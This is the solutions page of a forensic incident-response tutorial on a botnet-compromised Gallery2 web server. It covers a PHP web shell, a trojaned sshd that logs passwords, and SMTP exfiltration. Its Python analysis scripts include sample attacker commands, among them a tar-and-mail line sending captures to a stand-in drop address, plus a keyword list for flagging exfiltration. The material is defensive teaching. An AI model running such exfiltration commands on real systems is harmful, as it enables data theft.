Auscert2007 Tutorial Solutions
These are the spoilers for the 2007 tutorial. You may want to try solving the tutorial first before looking here.
These solutions may not be complete; there may be more to be found, or things could be done differently. Feel free to update this page in a positive way.
Disclaimer
Creating a hands-on tutorial is invariably difficult because I can't provide real evidence, so things are a little concocted. I tried to reflect the type of incidents I see in my daily work within this tutorial. These may or may not be applicable to the scenarios you encounter; take everything with a grain of salt, as it's just a simulation. It's very difficult to fabricate real evidence and I'm sure you will find holes or discrepancies in this tutorial; try to take the important lessons away. If you have better suggestions, please do not hesitate to mail pyflag-devel@lists.sourceforge.net.
Background Case Study 1
This is a quick recap of the backgrounds to the incident.
- You are the incident response team leader at an ISP selling hosted solutions.
- You receive a call from your friendly law enforcement contact advising you that a web site under your control is suspected of being involved in botnet activity.
- You decide to respond.
- You have at your disposal:
  - The firewall logs.
  - The image you have taken of the server's hard disk.
  - The sample network capture your IDS has taken of activity going to said host.
The web site in question is a photo appreciation site at http://you-like.myphotos.cc/.
- This is a typical LAMP server running Ubuntu Edgy (7.04).
- The web site is protected by an iptables firewall (Shorewall) with full logging turned on (but no one ever looks at the logs regularly).
Disk Image analysis
- The disk was imaged using ewfacquire and then loaded into PyFlag.
- The first thing we want to look at is the web directory.
- The main application on the system is Gallery2
- View the timeline
- Limit the files to those in the gallery directory (/usr/share/gallery2)
- Immediately we can see that index.php was modified recently (more recently than the other files).
- What modifications were made?
- Can you see what was modified? A new parameter was added, and files were saved in /dev/ptys/.
- Examine the /dev/ptys/ directory - a couple of small files.
- These appear to be login details for web sites etc.
- We find a bunch of executables within the web root. Virus scanning those reveals they are well-known Trojan downloaders.
- We find a reference to these in the web root; can you tell what the exploit is? It's the ADODB ActiveX exploit.
We load the Apache log files into PyFlag.
- What pages were accessed from this host? In particular which php pages were accessed?
- We discover another main.php file in a subdirectory of the web root; it does not belong to the gallery application.
- It's a PHP shell application. Who is accessing this shell? What are they doing with it?
- How did the server get compromised?
- Load the net accounting logs. How many connections occurred to port 22? Where from?
- Which connection was successful?
- Examine the secure log; it is rather short, possibly deleted by the intruder.
- Keyword search unallocated space for authentication logs.
- Which logins were successful? Which scanner worked? Who logged in?
- We find that sshd has been modified; look for strings in it.
- There is a weird-looking directory referenced in it: /usr/man/.man/
- In there we see a log of all the passwords of everyone logging into the server. What was the original password they used? Was it complex?
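The three log questions above (how many connections hit port 22 and from where, which sshd authentication records survive in unallocated space, and what a strings search of the modified sshd turns up) can be worked through in one short script. The following is an added example, not part of the tutorial or of PyFlag: the Shorewall lines, the chunk of "unallocated space" and the stand-in sshd binary are all constructed here, the addresses come from documentation ranges, and the only page-specific value used is the /usr/man/.man/ path the tutorial names.

```python
"""Correlate firewall SSH connection attempts with sshd auth records carved
from unallocated space, then pull suspicious paths out of a binary.
Added example: every input below is constructed, not from the tutorial image."""
import re
from collections import Counter

# Constructed Shorewall (iptables LOG target) lines. Shorewall prefixes the
# kernel message with "Shorewall:<chain>:<action>:"; the rest is the usual
# SRC=/DST=/PROTO=/SPT=/DPT= format. Addresses are documentation ranges.
FIREWALL_LOG = """\
Mar  3 02:11:07 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=40211 DPT=22 WINDOW=5840 SYN URGP=0
Mar  3 02:11:09 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=40212 DPT=22 WINDOW=5840 SYN URGP=0
Mar  3 02:11:11 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=40213 DPT=22 WINDOW=5840 SYN URGP=0
Mar  3 02:11:13 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=40214 DPT=22 WINDOW=5840 SYN URGP=0
Mar  3 02:40:02 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=192.0.2.50 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=33001 DPT=80 WINDOW=5840 SYN URGP=0
Mar  3 03:05:41 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=198.51.100.23 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=51020 DPT=22 WINDOW=5840 SYN URGP=0
Mar  3 03:05:44 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=198.51.100.23 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=51021 DPT=22 WINDOW=5840 SYN URGP=0
Mar  3 03:05:48 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=198.51.100.23 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=51022 DPT=22 WINDOW=5840 SYN URGP=0
Mar  3 03:06:10 web kernel: Shorewall:net2fw:ACCEPT:IN=eth0 OUT= SRC=198.51.100.23 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=51023 DPT=25 WINDOW=5840 SYN URGP=0
"""

FW_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\S+) "
                   r"SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)")


def connections_to_port(log_text, port=22):
    """Count new TCP connections (SYN packets) per source address to one port."""
    counts = Counter()
    for line in log_text.splitlines():
        m = FW_RE.search(line)
        if m and m["proto"] == "TCP" and int(m["dpt"]) == port and " SYN" in line:
            counts[m["src"]] += 1
    return counts


# Constructed "unallocated space": binary junk with auth.log fragments that
# survived the intruder's deletion of the secure log.
UNALLOCATED = (
    b"\x00\x00\x7fELF\x01\x02" * 3
    + b"Mar  3 02:11:07 web sshd[4412]: Failed password for invalid user test from 203.0.113.7 port 40211 ssh2\n"
    + b"\xff\xfe\x00\x01"
    + b"Mar  3 02:11:09 web sshd[4413]: Failed password for invalid user admin from 203.0.113.7 port 40212 ssh2\n"
    + b"\x00" * 16
    + b"Mar  3 03:05:44 web sshd[4490]: Failed password for root from 198.51.100.23 port 51021 ssh2\n"
    + b"\x00\x00"
    + b"Mar  3 03:05:48 web sshd[4491]: Accepted password for root from 198.51.100.23 port 51022 ssh2\n"
    + b"\x00\x00garbage\x00"
)


def printable_runs(data, min_len=4):
    """Like strings(1): every run of min_len or more printable ASCII bytes."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


AUTH_RE = re.compile(
    rb"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    rb"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) "
    rb"from (?P<src>\S+) port (?P<port>\d+)")


def carve_auth_events(data):
    """Pull sshd authentication records out of raw disk bytes, in disk order."""
    events = []
    for run in printable_runs(data):
        m = AUTH_RE.search(run)
        if m:
            events.append({k: v.decode() for k, v in m.groupdict().items()})
    return events


def correlate(fw_counts, events):
    """Per source: SSH SYNs seen by the firewall, failed logins, accepted users."""
    report = {src: {"syn": n, "failed": 0, "accepted": []} for src, n in fw_counts.items()}
    for ev in events:
        entry = report.setdefault(ev["src"], {"syn": 0, "failed": 0, "accepted": []})
        if ev["result"] == "Accepted":
            entry["accepted"].append(ev["user"])
        else:
            entry["failed"] += 1
    return report


# Constructed stand-in for a trojaned sshd: ELF magic, two legitimate paths and
# a hard-coded hidden directory where the backdoor writes captured passwords.
SSHD_BINARY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"/etc/ssh/sshd_config\x00"
               + b"/var/run/sshd.pid\x00" + b"\x90\x90" + b"/usr/man/.man/\x00"
               + b"Accepted password for %.100s\x00")

HIDDEN_DIR_RE = re.compile(r"(?:/[\w.-]+)*/\.[\w-]+/?")


def hidden_paths(binary):
    """Paths in the binary's strings that include a dot-directory component."""
    found = []
    for run in printable_runs(binary):
        found += [m.group() for m in HIDDEN_DIR_RE.finditer(run.decode("ascii"))]
    return found


if __name__ == "__main__":
    report = correlate(connections_to_port(FIREWALL_LOG, 22), carve_auth_events(UNALLOCATED))
    for src, r in sorted(report.items(), key=lambda kv: -kv[1]["syn"]):
        print(f"{src:15} syn={r['syn']} failed={r['failed']} accepted={r['accepted']}")
    print("hidden paths in sshd:", hidden_paths(SSHD_BINARY))
```

Run stand-alone it prints one line per source address with the SYN count and the failed and accepted logins, which answers "which scanner worked, who logged in" directly: the address with the most SYNs is not necessarily the one that got in. On a real image, feed printable_runs() the raw bytes of the unallocated blocks exported from PyFlag, and point hidden_paths() at the sshd binary.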
Network Forensics
Load the network forensics data into the case. This is a small subset of the total duration of the compromise but is typical of attacker behaviour.
- Locate access to the PHP shell; it is now possible to see what commands were run (through the POST variables).
- We find that data has been tarred up and sent away over SMTP.
- We can locate the SMTP connection. The tar file contains captured screenshots.
- Look at other connections:
  - IRC connection to a channel.
  - The attacker is discussing exchange of credit card numbers.
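Reconstructing the PHP shell session from the POST variables and checking what the SMTP session carried away, as an added example that is not part of the tutorial or of its capture: the HTTP requests and the mail session below are constructed, the shell path /gallery2/images/main.php and the form field named cmd are assumptions (read the real field name out of the rogue main.php), and the addresses are documentation ranges.

```python
"""Reconstruct what an intruder ran through a PHP web shell from captured
HTTP POST bodies, and list what left the server inside an SMTP attachment.
Added example: the capture and mail session are constructed, not taken from
the tutorial's pcap; the shell path and the "cmd" field are assumptions."""
import base64
import email
import io
import tarfile
from email import policy
from urllib.parse import parse_qs, urlencode

SHELL_PATH = "/gallery2/images/main.php"   # assumed location of the rogue main.php


def raw_request(method, path, body=""):
    """One HTTP/1.1 request as it appears in a reassembled TCP stream."""
    hdrs = [f"{method} {path} HTTP/1.1", "Host: you-like.myphotos.cc"]
    if body:
        hdrs += ["Content-Type: application/x-www-form-urlencoded",
                 f"Content-Length: {len(body)}"]
    return ("\r\n".join(hdrs) + "\r\n\r\n" + body).encode()


# (time, source address, raw request) tuples; all constructed.
CAPTURE = [
    ("03:12:01", "198.51.100.23", raw_request("GET", SHELL_PATH)),
    ("03:12:20", "198.51.100.23", raw_request("POST", SHELL_PATH, urlencode({"cmd": "id"}))),
    ("03:13:05", "198.51.100.23", raw_request("POST", SHELL_PATH, urlencode({"cmd": "ls -la /var/www"}))),
    ("03:15:40", "198.51.100.23", raw_request("POST", SHELL_PATH,
                                              urlencode({"cmd": "tar czf /tmp/shots.tgz /home/www/captures"}))),
    ("03:16:02", "198.51.100.23", raw_request("POST", SHELL_PATH,
                                              urlencode({"cmd": "mail -s shots drop@example.invalid < /tmp/shots.tgz"}))),
    ("03:20:11", "192.0.2.50", raw_request("GET", "/gallery2/main.php?g2_itemId=12")),      # ordinary visitor
    ("03:21:00", "192.0.2.50", raw_request("POST", "/gallery2/main.php", urlencode({"g2_form[useJs]": "1"}))),
]


def shell_commands(capture, shell_path=SHELL_PATH, field="cmd"):
    """(time, source, command) for every POST to the shell that carries a command."""
    out = []
    for ts, src, raw in capture:
        head, _, body = raw.partition(b"\r\n\r\n")
        method, path, _ = head.split(b"\r\n", 1)[0].decode().split(" ", 2)
        if method != "POST" or path.split("?")[0] != shell_path:
            continue
        for cmd in parse_qs(body.decode(), keep_blank_values=True).get(field, []):
            out.append((ts, src, cmd))
    return out


PACKAGE_OR_MAIL = ("tar ", "zip ", "mail ", "sendmail", "uuencode ")


def exfil_indicators(commands):
    """Shell commands that bundle data or hand it to the mail system."""
    return [c for c in commands if any(w in c[2] for w in PACKAGE_OR_MAIL)]


def build_smtp_data(files):
    """Constructed SMTP DATA section carrying a gzipped tar as a base64 attachment
    (line endings are \\n here; on the wire they would be CRLF, which the
    email parser also accepts)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    b64 = base64.encodebytes(buf.getvalue()).decode()
    return ("From: www-data@you-like.myphotos.cc\nTo: drop@example.invalid\n"
            "Subject: shots\nMIME-Version: 1.0\n"
            'Content-Type: multipart/mixed; boundary="b1"\n\n--b1\n'
            'Content-Type: application/octet-stream; name="shots.tgz"\n'
            'Content-Disposition: attachment; filename="shots.tgz"\n'
            "Content-Transfer-Encoding: base64\n\n" + b64 + "\n--b1--\n")


SMTP_DATA = build_smtp_data({"captures/desk-01.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
                             "captures/desk-02.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 48})


def attachment_members(smtp_data):
    """File names inside every tar attachment of a captured mail message."""
    msg = email.message_from_string(smtp_data, policy=policy.default)
    names = []
    for part in msg.iter_attachments():
        blob = io.BytesIO(part.get_payload(decode=True))
        with tarfile.open(fileobj=blob, mode="r:*") as tar:
            names += tar.getnames()
    return names


if __name__ == "__main__":
    cmds = shell_commands(CAPTURE)
    for ts, src, cmd in cmds:
        print(ts, src, repr(cmd))
    print("likely exfiltration:", [c for _, _, c in exfil_indicators(cmds)])
    print("files in mailed tarball:", attachment_members(SMTP_DATA))
```

The command list is the timeline the tutorial asks for; it is keyed on the shell's own path, so ordinary visitors' POSTs to the real gallery main.php are ignored. attachment_members() only lists what was mailed; matching those names against the tar command in the shell timeline ties the two streams together.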
